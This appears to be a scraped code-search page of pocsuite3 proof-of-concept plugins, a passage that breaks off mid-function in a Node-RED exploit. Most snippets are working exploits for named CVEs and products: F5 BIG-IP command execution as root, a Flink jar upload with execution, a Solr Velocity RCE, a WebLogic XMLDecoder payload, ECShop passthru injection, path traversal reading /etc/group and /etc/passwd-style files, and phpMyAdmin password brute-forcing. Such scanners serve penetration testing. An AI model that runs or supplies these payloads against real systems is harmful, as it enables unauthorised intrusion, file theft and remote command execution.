pocsuite3.api.requests.get

Here are the examples of the python api pocsuite3.api.requests.get taken from open source projects. By voting up you can indicate which examples are most useful and appropriate.

58 Examples 7

3 Source : bt_unauth_access_phpmyadmin.py
with GNU General Public License v3.0
from 78778443

    def exploit(self, mode):
        result = {}

        url_pr = urlparse(self.url)
        scheme = url_pr.scheme
        host = url_pr.hostname
        port = 888

        vul_url = "{}://{}:{}/pma/".format(scheme, host, port)
        resp = requests.get(vul_url, timeout=5)
        if resp.status_code == 200 and "phpmyadmin" in resp.text:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = vul_url
        return result

    def _verify(self):

3 Source : check_http_status.py
with GNU General Public License v3.0
from 78778443

    def _verify(self):
        result = {}
        # print(self.url)
        url = self.url
        # print(url)
        try:
            resp = requests.get(url, verify=False, timeout=5)
            if resp.status_code != 404:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['PoC'] = str(resp.status_code)
        except Exception as ex:
            logger.error(str(ex))
        return self.parse_output(result)

    def _attack(self):

3 Source : CVE-2021-21972.py
with GNU General Public License v3.0
from 78778443

    def _verify(self):
        result = {}

        try:
            vul_url = urljoin(
                self.url, "/ui/vropspluginui/rest/services/uploadova")
            resp1 = requests.get(self.url)
            resp2 = requests.get(vul_url)
            if '/vsphere-client' in resp1.text and resp2.status_code == 405:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
        except Exception as e:
            logger.error(e)

        return self.parse_output(result)

    def _attack(self):

3 Source : CVE-2021-26855.py
with GNU General Public License v3.0
from 78778443

    def _verify(self):
        result = {}

        try:
            vul_url = urljoin(self.url, "/owa/auth/x.js")
            headers = {
                'Cookie': 'X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;'
            }
            resp = requests.get(vul_url, headers=headers, timeout=10)
            if resp.status_code == 500 and 'NegotiateSecurityContext' in resp.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
        except Exception as e:
            logger.error(e)

        return self.parse_output(result)

    def _attack(self):

3 Source : fofacms.py
with GNU General Public License v3.0
from 78778443

    def _verify(self):
        """verify mode"""
        result = {}
        target = self.url

        try:
            resp = requests.get(target).text
            cms_info = self.fingerprint(resp)
            if cms_info != "":
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = target
                result['VerifyInfo']['Info'] = cms_info
        except Exception as ex:
            logger.error(str(ex))
        return self.parse_output(result)

    def parse_output(self, result):

3 Source : node_red_unauthorized_rce.py
with GNU General Public License v3.0
from 78778443

def need_auth(url):
    response = requests.get("{}/settings".format(url))
    if response.status_code == 401:
        return 1
    return 0


def login(url, username="admin", password="password"):

3 Source : phpmyadmin_burst.py
with GNU General Public License v3.0
from 78778443

    def pma_login(self, url, username, password):
        for i in range(2):
            try:
                res = requests.get(url)
                cookies = dict(res.cookies)
                data = {
                    'set_session': html.unescape(re.search(r"name=\"set_session\" value=\"(.+?)\"", res.text, re.I).group(1)),
                    'token': html.unescape(re.search(r"name=\"token\" value=\"(.+?)\"", res.text, re.I).group(1)),
                    'pma_username': username,
                    'pma_password': password,
                }
                res = requests.post(url, cookies=cookies, data=data, timeout=3)
                cookies = dict(res.cookies)
                return 'pmaAuth-1' in cookies
            except:
                pass
        return False

    def get_word_list(self):

3 Source : unauthorized-check.py
with GNU General Public License v3.0
from 78778443

    def elasticsearch(self, ip):
        try:
            url = 'http://' + ip + ':9200/_cat'
            r = requests.get(url, timeout=5)
            if '/_cat/master' in r.content.decode():
                return ip + ":9200 elasticsearch未授权"
            return False
        except Exception as e:
            pass

    def zookeeper(self, ip):

3 Source : unauthorized-check.py
with GNU General Public License v3.0
from 78778443

    def CouchDB(self, ip):
        try:
            url = 'http://' + ip + ':5984'+'/_utils/'
            r = requests.get(url, timeout=5)
            if 'couchdb-logo' in r.content.decode():
                return ip + ":5984 CouchDB未授权"
            return False
        except Exception as e:
            pass

    def docker(self, ip):

3 Source : unauthorized-check.py
with GNU General Public License v3.0
from 78778443

    def docker(self, ip):
        try:
            url = 'http://' + ip + ':2375'+'/version'
            r = requests.get(url, timeout=5)
            if 'ApiVersion' in r.content.decode():
                return ip + ":2375 docker api未授权"
            return False
        except Exception as e:
            pass

    def Hadoop(self, ip):

3 Source : unauthorized-check.py
with GNU General Public License v3.0
from 78778443

    def Hadoop(self, ip):
        try:
            url = 'http://' + ip + ':50070'+'/dfshealth.html'
            r = requests.get(url, timeout=5)
            if 'hadoop.css' in r.content.decode():
                return ip + ":50070 Hadoop未授权"
            return False
        except Exception as e:
            pass

    def _attack(self):

3 Source : wd_nas_login_bypass_rce.py
with GNU General Public License v3.0
from 78778443

    def _verify(self):
        result = {}

        veri_url1 = urljoin(self.url, '/cgi-bin/network_mgr.cgi?cmd=cgi_get_ipv6&flag=1')
        veri_url2 = urljoin(self.url, '/web/dsdk/DsdkProxy.php')
        cmd = 'cat /proc/cpuinfo'
        data = "';{};'".format(cmd)
        headers = {'cookie': 'isAdmin=1;username=admin'}
        try:
            requests.get(veri_url1)
            resp = requests.post(veri_url2, data=data, headers=headers)
            if any(keyword in resp.text for keyword in ['Processor', 'BogoMIPS', 'Hardware', 'Revision']):
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
        except Exception as e:
            logger.warn(str(e))
        return self.parse_verify(result)

    def _attack(self):

3 Source : wd_nas_login_bypass_rce.py
with GNU General Public License v3.0
from 78778443

    def _shell(self):
        veri_url1 = urljoin(self.url, '/cgi-bin/network_mgr.cgi?cmd=cgi_get_ipv6&flag=1')
        veri_url2 = urljoin(self.url, '/web/dsdk/DsdkProxy.php')
        cmd = self.get_option("command")
        data = "';{};'".format(cmd)
        headers = {'cookie': 'isAdmin=1;username=admin'}
        try:
            requests.get(veri_url1)
            requests.post(veri_url2, data=data, headers=headers)
        except Exception as e:
            logger.warn(str(e))

    def parse_verify(self, result):

3 Source : ShellShock_Bash_RCE.py
with GNU General Public License v3.0
from 78778443

def get_url(url):
    try:
        return requests.get(url).url
    except:
        return url


def fix_url(url):

3 Source : ShellShock_Bash_RCE.py
with GNU General Public License v3.0
from 78778443

def is_url_exist(url):
    try:
        resp = requests.get(url)
        if resp.status_code == 404:
            return True
    except Exception as e:
        pass
    return False


def isSameDomain(url1, url2):

3 Source : shiziyuCMS_sqli.py
with GNU General Public License v3.0
from 78778443

    def _verify(self):
        result = {}
        payload = r"index.php?s=apigoods/get_goods_detail&id=1%20and%20updatexml(1,concat(0x7e,(database()),0x7e),1)"
        url = self.url + payload
        r = requests.get(url, verify=False)
        if "XPATH syntax error" in r.text:
            regx = re.findall(r'XPATH syntax error: .*?\r\n', r.text)
            dbname = re.findall(r'~.*?~', regx[0])[0]
            result['VerifyInfo'] = {}
            result['Database'] = {}
            result['Database']['DBname'] = dbname.strip('~')
            result['VerifyInfo']['URL'] = url
        return self.parse_output(result)
    
    def _attack(self):

0 Source : springboot_actuator_all_unauthorized.py
with GNU General Public License v3.0
from 78778443

    def _verify(self):
        result = {}
        # 测试路径和接口字典:
        dir_path = ('', 'actuator', 'moniter')
        dir_file_list = ('mappings', 'metrics', 'beans', 'configprops', 'env')
        api_filie_list = ('swagger-ui.html', 'api-docs', 'v2/api-docs')
        result_verified_url = []
        # 测试sprintboot actuator
        for path in dir_path:
            for file_name in dir_file_list:
                url_list = []
                url_list.append(self.url)
                if not self.url.endswith('/'):
                    url_list.append('/')
                if path:
                    url_list.append(path + '/')
                url_list.append(file_name)
                url = ''.join(url_list)
                try:
                    r = req.get(url)
                    if r.status_code == 200:
                        try:
                            # 正常情况下返回是JSON格式
                            json.loads(r.text)
                            result_verified_url.append(
                                '{}/{}'.format(path, file_name))
                        except:
                            pass
                except:
                    pass
            # 一般来说只会配置一个web prefix,所以如果测试有就不尝试其它目录了
            if len(result_verified_url) > 0:
                break
        # 测试api、swagger:
        for file_name in api_filie_list:
            if self.url.endswith('/'):
                url = self.url + file_name
            else:
                url = self.url + '/' + file_name
            try:
                r = req.get(url)
                if r.status_code == 200:
                    result_verified_url.append(file_name)
            except:
                pass

        if len(result_verified_url) > 0:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['extra'] = {}
            result['extra']['evidence'] = '\r\n'.join(result_verified_url)

        return self.parse_attack(result)

    def _attack(self):

0 Source : f5-CVE-2020-5902_all_rce.py
with GNU General Public License v3.0
from 78778443

    def _verify(self):
        result = {}
        pr = urlparse(self.url)
        if pr.port:
            ports = [pr.port]
        else:
            ports = [443]

        for port in ports:
            for schema in ['http','https']:
                try:
                    # check bypass
                    url_check =  '{}://{}:{}/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=test5902'.format(schema,pr.hostname,port)
                    r_test = req.get(url_check,verify=False)
                    # check fileRead.jsp
                    if r_test.status_code == 200:                        
                        result['VerifyInfo'] = {}
                        result['VerifyInfo']['URL'] = '{}:{}'.format(pr.hostname, port)
                        
                        url_read =  '{}://{}:{}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/group'.format(schema,pr.hostname,port)
                        r_read = req.get(url_read,verify = False)
                        if r_read.status_code == 200:
                            result['extra'] = {}
                            result['extra']['evidence'] = r_read.content.decode('utf-8').strip()
                        break
                except:
                    #raise
                    pass
            

        return self.parse_attack(result)

    def _attack(self):

0 Source : flink-CVE-2020-17518_1.11.2_rce.py
with GNU General Public License v3.0
from 78778443

    def _verify(self):
        result = {}
        pr = urlparse(self.url)
        if pr.port:
            ports = [pr.port]
        else:
            ports = [8081]

        for port in ports:
            try:
                #get flink web path
                url_check = '{}://{}:{}/jobmanager/config'.format(pr.scheme, pr.hostname, port)
                r_test = req.get(url_check, verify=False)
                if r_test.status_code == 200:
                    m = re.findall(b'/tmp/flink-web-(.+?)"',r_test.content)
                    if not m:
                        continue
                    #upload jars
                    random_jars = '{}.jar'.format(random.randint(10000,100000))
                    flink_upload_pathfile = '/tmp/flink-web-{}/flink-web-upload/{}'.format(m[0].decode('utf-8'),random_jars)
                    upload_files = {'jarfile': (flink_upload_pathfile, base64.b64decode('UEsDBBQAAAAIAASBJlLHe4y+9gIAAOgEAAANAAAARXhlY3V0ZS5jbGFzc21Uy1bUQBC9zTwSQnhFBEZ8gAoOCIwiKgKivEWGhwbRATaZ0AcCMwkmPQIbN/oTfIFrNoNHjn6Av+MatToqLycn6UpX3Vt1q7uT7z+/fAPQixUNTehQcVtFp4YudGsoR0rFHWnvKuhRcE9Fr4r7GlQ8UPFQQZ+KRxqq0C+HARWDMvRYwZCGJ3iqoQ7DKkakHZXDmIJxBRMM8UHHdcQQQyTZvsgQHfVWOUN12nH5bCGf5f6Clc1xCuQtx2WoTy6nN6x3VipnuWspU/iOuzYgiZWmsOzNGWsrxJNABZOklEEb37H5lnA8N1DwjOamV/BtPuHIrPr4DrcLgnfLnDou4woDGBQv6HatPKWZ0vEc0zrSmCGJ246rYxZzDI0nIuZ9z+ZBMFJwcqvcZ6g5r4/y2fnVbr5DBctStizTQr5U1nFTwTqJCAmOl/qjqTwMZK1gXSLndbzASyJ2EdHEAkNtCC8IJ5cybct1ua/glY5FvJb4NwRdGdaRwZKOZdmP8rfHM8rmshvcFgwXSiwneU98x6t3trHdQPA8Q8UaF9T/FvfFLkNbssTelMpfIby0t839USsgWXXJkiDV9lxBmx4wNJ1OPLpu+SZ/W+CuzQfalxguJksfiTjfcQIRyKMlYbFAWL4g+Em5k92jerXnncSsov6m3K2CoLTcooYbiPxvu04FiN6YLBUIheiFgI/xnJN3hDwgt0ou03+7Sjljds4LOFpwiT5IeZWByUNK41WatZBlZGMdB2D7kCf3Go0awciJKOL0vTYTrCyE/6B5nOxHoyzdEemZMSKfES0iZsSLUPbQfAg1E/+K8kzE0MxM1KgwM7FO8wD67Cf0GpX90UNUZYzqA9QUUbsHxagm1zEnEZUc45jTVcQFGa/LJKjIxQPUGw1FNPbHErEiEvuymVBtD3QayxEh3Qq9N6CSfkHV6EMNJlGLafpbcPJuohHvkcAHWozrxGhF5Ai9Cm7QfYR6kPlF4aiCm/Qa3q0Ea6MnClp0epJh0fbfUEsDBAoAAAgAACJ1bU8AAAAAAAAAAAAAAAAJAAAATUVUQS1JTkYvUEsDBBQACAgIACJ1bU8AAAAAAAAAAAAAAAAUAAQATUVUQS1JTkYvTUFOSUZFU1QuTUb+ygAA803My0xLLS7RDUstKs7Mz7NSMNQz4OXyTczM03XOSSwutlJwrUhNLi1J5eXi5QIAUEsHCIiKCL8wAAAALgAAAFBLAQI/ABQAAAAIAASBJlLHe4y+9gIAAOgEAAANACQAAAAAAAAAIAAAAAAAAABFeGVjdXRlLmNsYXNzCgAgAAAAAAABABgAsQeXEAPk1gFyshItA+TWAdyLEi0D5NYBUEsBAgoACgAACAAAInVtTwAAAAAAAAAAAAAAAAkAAAAAAAAAAAAAAAAAIQMAAE1FVEEtSU5GL1BLAQIUABQACAgIACJ1bU+Iigi/MAAAAC4AAAAUAAQAAAAAAAAAAAAAAEgDAABNRVRBLUlORi9NQU5JRkVTVC5NRv7KAABQSwUGAAAAAAMAAwDcAAAAvgMAAAAA'))}
                    url_upload = '{}://{}:{}/jars/upload'.format(pr.scheme, pr.hostname, port)
                    r_upload = req.post(url_upload,files=upload_files,verify=False)
                    if r_upload.status_code != 400:
                        continue
                    # exeucte
                    random_log = 'flink--standalonesession-0-{}.log'.format(random.randint(10000,100000))
                    url_exeucte = '{}://{}:{}/jars/{}/run?entry-class=Execute&program-args="touch $FLINK_HOME/log/{}"'.format(
                        pr.scheme, pr.hostname, port,random_jars,random_log)
                    r_execute = req.post(url_exeucte, verify=False)
                    #  check log exists:
                    if r_execute.status_code != 400:
                        continue
                    url_log_exist  = '{}://{}:{}/jobmanager/logs/{}'.format(pr.scheme, pr.hostname, port,random_log)
                    r_exist = req.get(url_log_exist, verify=False)
                    if r_exist.status_code == 200:
                        result['VerifyInfo'] = {}
                        result['VerifyInfo']['URL'] = '{}:{}'.format(
                            pr.hostname, port)
                        break
            except:
                raise
                #pass

        return self.parse_attack(result)

    def _attack(self):

0 Source : flink-CVE-2020-17519_1.11.2_fileread.py
with GNU General Public License v3.0
from 78778443

    def _verify(self):
        result = {}
        pr = urlparse(self.url)
        if pr.port:
            ports = [pr.port]
        else:
            ports = [8081]

        for port in ports:
            try:
                url_check = '{}://{}:{}/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fgroup'.format(
                    pr.scheme, pr.hostname, port)
                r_test = req.get(url_check, verify=False)
                if r_test.status_code == 200 and re.findall(b'^root:x:0', r_test.content):
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = '{}:{}'.format(
                        pr.hostname, port)
                    result['extra'] = {}
                    result['extra']['evidence'] = r_test.content.decode(
                        'utf-8').strip()

            except:
                #raise
                pass

        return self.parse_attack(result)

    def _attack(self):

0 Source : hikvision-2013-4976_web_login-bypass.py
with GNU General Public License v3.0
from 78778443

def check(uri):
    headers = {
        'User-Agent': 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'}
    timeout = 5
    url = '{}/doc/page/main.asp'.format(uri)
    cookies = {'userInfo80': 'YW5vbnltb3VzOlwxNzdcMTc3XDE3N1wxNzdcMTc3XDE3Nw=='}
    try:
        r = req.get(url, headers=headers, cookies=cookies, timeout=timeout)
        if b'playback.asp' in r.content and b'  <  div id="mainFrame">' in r.content:
            return True, url
        else:
            return False, 'No server page find'
    except req.exceptions.ConnectionError:
        return False, 'ConnectionError'
    except req.exceptions.ReadTimeout:
        return False, 'ReadTimeout'
    except Exception as e:
        # raise
        return False, str(e)


class TestPOC(POCBase):

0 Source : iis-ms15-034_7_rce.py
with GNU General Public License v3.0
from 78778443

    def _verify(self):
        def check(url):
            Server_Tag = ['Microsoft-HTTP', 'Microsoft-IIS']
            try:
                Request_Tmp = req.get(url)
                remote_server = Request_Tmp.headers['server']
                if (tmp_tag in remote_server for tmp_tag in Server_Tag):
                    return test_ms15_034(url)
                else:
                    return (False, 'Web Service Is Not IIS\n[+] May Be ' + remote_server)
            except req.exceptions.ConnectTimeout:
                return (False, 'timeout')
            except Exception as e:
                # raise
                return (False, '{}'.format(str(e)))

        def test_ms15_034(url):
            Req_headers = {'Host': 'stuff',
                           'Range': 'bytes=0-18446744073709551615'}
            Request = req.get(url, headers=Req_headers)
            if b'Requested Range Not Satisfiable' in Request.content:
                return (True, Request.content)
            elif b'The request has an invalid header name' in Request.content:
                return (False, 'The vulnerability has been fixed!')
            else:
                return (False, 'The IIS service was unable to display the vulnerability exists, the need for manual testing!')

        result = {}
        pr = urlparse(self.url)
        if pr.port:  # and pr.port not in ports:
            ports = [pr.port]
        else:
            ports = [80]
        for port in ports:
            try:
                url = '{}://{}:{}'.format(pr.scheme, pr.hostname, port)
                status, msg = check(url)
                if status:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = '{}:{}'.format(
                        pr.hostname, port)
                    break
            except:
                pass

        return self.parse_output(result)

    def _attack(self):

0 Source : iis-shortname_6_disclosure.py
with GNU General Public License v3.0
from 78778443

    def _verify(self):
        # reference from https://github.com/lijiejie/IIS_shortname_Scanner/blob/master/iis_shortname_Scan.py
        def check(url):
            url1 = url + '/*~1*/index99.aspx'         # an existed file/folder
            url2 = url + '/1ndex*~1*/index99.aspx'    # not existed file/folder
            # for _method in ['GET', 'OPTIONS']:
            try:
                # GET:
                r1 = req.get(url1)
                status_1 = r1.status_code
                r2 = req.get(url2)
                status_2 = r2.status_code
                if status_1 == 404 and status_2 != 404:
                    return True
                # OPTIONS:
                r1 = req.options(url1)
                status_1 = r1.status_code
                r2 = req.options(url2)
                status_2 = r2.status_code
                if status_1 == 404 and status_2 != 404:
                    return True
                return False
            except Exception as e:
                # raise
                return False

        result = {}
        pr = urlparse(self.url)
        if pr.port:  # and pr.port not in ports:
            ports = [pr.port]
        else:
            ports = [80]
        for port in ports:
            try:
                url = '{}://{}:{}'.format(pr.scheme, pr.hostname, port)
                status = check(url)
                if status:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = '{}:{}'.format(
                        pr.hostname, port)
                    break
            except:
                pass

        return self.parse_output(result)

    def _attack(self):

0 Source : solr_8.3.1_rce.py
with GNU General Public License v3.0
from 78778443

    def _verify(self):
        result = {}

        pr = urlparse(self.url)
        if pr.port:
            ports = [pr.port]
        else:
            ports = [8983]
        for port in ports:
            target = '{}://{}:{}'.format(pr.scheme, pr.hostname, port)
            # 获取目标系统任意核心
            target1 = target + "/solr/admin/cores?indexInfo=false&wt=json"
            headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:73.0) Gecko/20100101 Firefox/73.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
                       "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "DNT": "1", "Connection": "close", "Referer": self.url, "Upgrade-Insecure-Requests": "1"}
            res1 = req.get(target1, headers=headers)
            core = json.loads(res1.content.decode())
            core2 = core['status'].keys()
            core3 = list(core2)[0]

            # 修改core下的配置文件,开启params.resource.loader.enabled
            target2 = target + "/solr/" + core3 + "/config"
            post_json = {"update-queryresponsewriter": {"class": "solr.VelocityResponseWriter", "name": "velocity",
                                                        "params.resource.loader.enabled": "true", "solr.resource.loader.enabled": "true", "startup": "lazy", "template.base.dir": ""}}
            res2 = req.post(target2, headers=headers, json=post_json)

            # 开启后,直接Get 访问(带入表达式)进行 远程代码命令执行
            target3 = target + "/solr/" + core3 + \
                "/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27echo%20d0xdeadbeaf%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end"
            response = req.get(target3, headers=headers)
            if response and response.status_code == 200 and "0xdeadbeaf" in response.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = '{}:{}'.format(
                    pr.hostname, port)
                break
        return self.parse_output(result)

    def _attack(self):

0 Source : weblogic-console-2020-14882_all_rce.py
with GNU General Public License v3.0
from 78778443

    def _verify(self):
        headers = {
            'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)'}

        def check_console(target):
            if not target.startswith('http'):
                target = 'http://{}'.format(target)
            url = '{}/console/'.format(target)
            try:
                r = req.get(url, headers=headers, verify=False, timeout=5)
                if r.status_code == req.codes.ok:
                    if 'Deploying application for /console/...' in r.text:
                        time.sleep(2)
                    return (True, r.text.strip())
                elif r.status_code == 404:
                    return (False, '404')
                else:
                    return (False, r.status_code)
            except req.exceptions.ReadTimeout:
                return (False, 'timeout')
            except Exception as ex:
                # raise
                return (False, str(ex))

        def check_weblogic_console_page(target):
            s = req.session()
            console_url = '/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=HomePage1'
            if not target.startswith('http'):
                target = 'http://{}'.format(target)
            url = '{}{}'.format(target, console_url)
            try:
                # get session cookes
                r = s.get(url, allow_redirects=False)
                # 302 to portal
                if r.status_code == 302:
                    r = s.get(url)
                    if r.status_code == 200 and 'id="HomePage1"' in r.text:
                        m = re.findall(
                            '  <  p id="footerVersion">(.*?) < /p>', r.text)
                        if m:
                            return (True, m[0])
                        else:
                            return(True, '')
                return (False, '')
            except req.exceptions.ReadTimeout:
                return (False, 'timeout')
            except Exception as ex:
                # raise
                return (False, str(ex))
        '''
        verify:
        '''
        result = {}
        pr = urlparse(self.url)
        if pr.port:  # and pr.port not in ports:
            ports = [pr.port]
        else:
            ports = [7001, 17001, 27001]
        for port in ports:
            uri = "{0}://{1}:{2}".format(pr.scheme, pr.hostname, str(port))
            status, msg = check_console(uri)
            if status:
                status, msg = check_weblogic_console_page(uri)
                if status:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = uri
                    result['extra'] = {}
                    result['extra']['evidence'] = msg
                    break

        return self.parse_output(result)

    def _attack(self):

0 Source : weblogic-wls-2017-10271_all_rce.py
with GNU General Public License v3.0
from 78778443

    def _verify(self):
        flag = "".join(random.choice(string.ascii_letters)
                       for _ in range(0, 8))
        output_file = '{}.txt'.format(flag)
        '''
        payload的格式化
        '''
        def payload_command():
            command_filtered = "  <  string>{} < /string>".format(flag)
            payload_1 = '''
             < soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
             < soapenv:Header> < work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
             < java>
             < java version="1.6.0" class="java.beans.XMLDecoder">
             < object class="java.io.PrintWriter">
             < string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/{} < /string>
             < void method="println">{} < /void> < void method="close"/>
             < /object>
             < /java>
             < /java>
             < /work:WorkContext>
             < /soapenv:Header> < soapenv:Body/> < /soapenv:Envelope>'''.format(output_file, command_filtered)
            return payload_1

        '''
        检查结果
        '''
        def verify_result(target):
            headers = {
                'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)'}
            # url增加时间戳避免数据是上一次的结果缓存
            output_url = '{}/bea_wls_internal/{}?{}'.format(
                target, output_file, int(time.time()))
            try:
                r = req.get(output_url, headers=headers)
                if r.status_code == req.codes.ok and flag in r.text:
                    return (True, 'success')
                elif r.status_code == 404:
                    return (False, '404 no output')
                else:
                    return (False, r.status_code)
            except req.exceptions.ReadTimeout:
                return (False, 'timeout')
            except Exception as ex:
                # raise
                return (False, str(ex))

        '''
        RCE POC
        '''
        def weblogic_rce(target):
            url = '{}/wls-wsat/CoordinatorPortType'.format(target)
            # content-type必须为text/xml
            payload_header = {'content-type': 'text/xml',
                              'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)'}
            try:
                r = req.post(url, payload_command(),
                             headers=payload_header, verify=False)
                # 500时说明已成功反序列化执行命令
                if r.status_code == 500:
                    return verify_result(target)
                elif r.status_code == 404:
                    return (False, '404 no vulnerability')
                else:
                    return (False, '{} something went wrong'.format(r.status_code))
            except req.exceptions.ReadTimeout:
                return (False, 'timeout')
            except Exception as ex:
                # raise
                return (False, str(ex))

        '''
        verify:
        '''
        result = {}
        pr = urlparse(self.url)
        if pr.port:  # and pr.port not in ports:
            ports = [pr.port]
        else:
            ports = [7001, 17001, 27001]
        for port in ports:
            uri = "{0}://{1}:{2}".format(pr.scheme, pr.hostname, str(port))
            status, msg = weblogic_rce(uri)
            if status:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = uri
                break

        return self.parse_output(result)

    def _attack(self):

0 Source : CVE-2020-3452.py
with GNU General Public License v3.0
from 78778443

    def _verify(self):
        result = {}
        # print(self.url)
        url = self.url
        # print(url)

        try:
            poc1 = '{}/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../'
            poc2 = '{}/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua'

            resp_poc1 = requests.get(poc1.format(url), verify=False, timeout=5)
            resp_poc2 = requests.get(poc2.format(url), verify=False, timeout=5)

            # flag = random_str(length=10)

            if ('common.lua' in resp_poc1.text) or ('browser_inc.lua' in resp_poc1.text):
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['PoC'] = poc1.format('')
            elif ('common.lua' in resp_poc2.text) or ('browser_inc.lua' in resp_poc2.text):
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['PoC'] = poc2.format('')
        except Exception as ex:
            logger.error(str(ex))
        return self.parse_output(result)

    def _attack(self):

0 Source : CVE-2020-5902.py
with GNU General Public License v3.0
from 78778443

    def _verify(self):
        result = {}
        # print(self.url)
        url = self.url.replace("http://", "")
        # print(url)

        try:
            url1 = 'https://{}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash'
            url2 = 'https://{}/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/cmd&content=id'
            url3 = 'https://{}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/cmd'
            url4 = 'https://{}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list'

            requests.get(url1.format(url), verify=False, timeout=5)
            requests.get(url2.format(url), verify=False, timeout=5)

            # flag = random_str(length=10)

            resp = requests.get(url3.format(url), verify=False, timeout=5)
            if 'uid=0(root)' in resp.text:
                r = requests.get(
                    'https://{}/tmui/login.jsp'.format(url), verify=False, timeout=5)
                hostname = re.search(
                    r'  <  p\stitle=\"(.*?)\">', r.text).group(1).strip().lower()
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['Hostname'] = hostname
        except Exception as ex:
            logger.error(str(ex))
        requests.get(url4.format(url), verify=False, timeout=5)
        return self.parse_output(result)

    def _attack(self):

0 Source : ecshop_rce.py
with GNU General Public License v3.0
from 78778443

    def _verify(self):
        result = {}
        url = urljoin(self.url, '/user.php?act=login')
        phpcode = "phpinfo()"
        flagText = "allow_url_include"

        # ECShop 2.x payload
        ec2payload = self.gen_ec2payload(phpcode)
        # ECShop 3.x payload
        ec3payload = self.gen_ec3payload(phpcode)

        option = self.get_option("app_version")

        if option == "Auto":
            payloads = [(ec2payload, '2.x'), (ec3payload, '3.x')]
        elif option == "2.x":
            payloads = [(ec2payload, '2.x')]
        elif option == '3.x':
            payloads = [(ec3payload, '3.x')]

        for payload, version in payloads:
            headers = {'Referer': payload}
            try:
                rr = requests.get(url, headers=headers)
                if flagText in rr.text:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = self.url
                    result['VerifyInfo']['Version'] = version
                    break
            except ReadTimeout:
                break
            except Exception as e:
                pass

        return self.parse_output(result)

    def parse_output(self, result):

0 Source : ecshop_rce.py
with GNU General Public License v3.0
from 78778443

    def _exploit(self, cmd='whoami'):
        url = urljoin(self.url, '/user.php?act=login')

        phpcode = 'passthru("{0}");'.format(cmd)

        # ECShop 2.x payload
        ec2payload = self.gen_ec2payload(phpcode)
        # ECShop 3.x payload

        ec3payload = self.gen_ec3payload(phpcode)
        option = self.get_option("app_version")
        if option == "Auto":
            payloads = [(ec2payload, '2.x'), (ec3payload, '3.x')]
        elif option == "2.x":
            payloads = [(ec2payload, '2.x')]
        elif option == '3.x':
            payloads = [(ec3payload, '3.x')]
        # payloads = [ec2payload, ec3payload]

        for payload in payloads:
            headers = {'Referer': payload[0]}
            resp = requests.get(url, headers=headers)
            r = get_middle_text(resp.text, '''  <  input type="hidden" name="back_act" value="''', "\n < br />")
            if r:
                return r
            r = get_middle_text(resp.text, ''' < input type="hidden" name="back_act" value="''', 'xxx')
            if r:
                return r


register_poc(DemoPOC)

0 Source : node_red_unauthorized_rce.py
with GNU General Public License v3.0
from 78778443

async def exploit(url, command, shell=False, access_token=None):
    ws_url = url.replace("http", "ws")
    headers = {"Node-RED-API-Version": "v2"}

    if access_token is not None:
        headers["Authorization"] = "Bearer {}".format(access_token)

    async with websockets.connect("{}/comms".format(ws_url)) as websocket:
        if access_token is not None:
